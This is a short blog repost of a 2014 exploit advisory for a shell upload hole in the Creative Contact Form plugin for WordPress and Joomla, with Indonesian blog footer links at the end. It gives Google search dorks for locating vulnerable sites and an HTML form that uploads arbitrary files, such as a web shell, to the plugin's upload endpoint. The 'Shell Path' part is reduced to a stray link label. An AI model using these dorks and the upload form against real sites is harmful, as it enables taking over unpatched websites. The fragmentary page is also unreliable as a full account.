Creative Contact Form Shell Upload Vulnerability ( Joomla & Wordpress )


#- Title: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#- Author: Vulnerability discovered by Gianni Angelozzi
                  Exploit written by Claudio Viviani
#- Date: 2014-10-25
#- Developer : creative-solutions .net
#- Link Download : creative-solutions .net/joomla/creative-contact-form
                               creative-solutions .net/wordpress/creative-contact-form
#- Google Dork: inurl:"/sexy-contact-form/" (wordpress )
                           inurl:com_creativecontactform ( joomla )
#- Fixed in Version : wp > 0.9.7 Joomla>2.0.0
#- Tested on : Backbox
===================================================

-- Proof Of Concept --
When Vuln : {"files":
CSRF : 
<form method="POST" action="http://target. com/components/com_sexycontactform/fileupload/index.php"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
Shell Path : Here
 
• Request Artikel / Lapor link rusak = here
• Join Grup Facebook = here
• Di Rekomendasikan Menggunakan Google Chrome
Previous
Next Post »
Thanks for your comment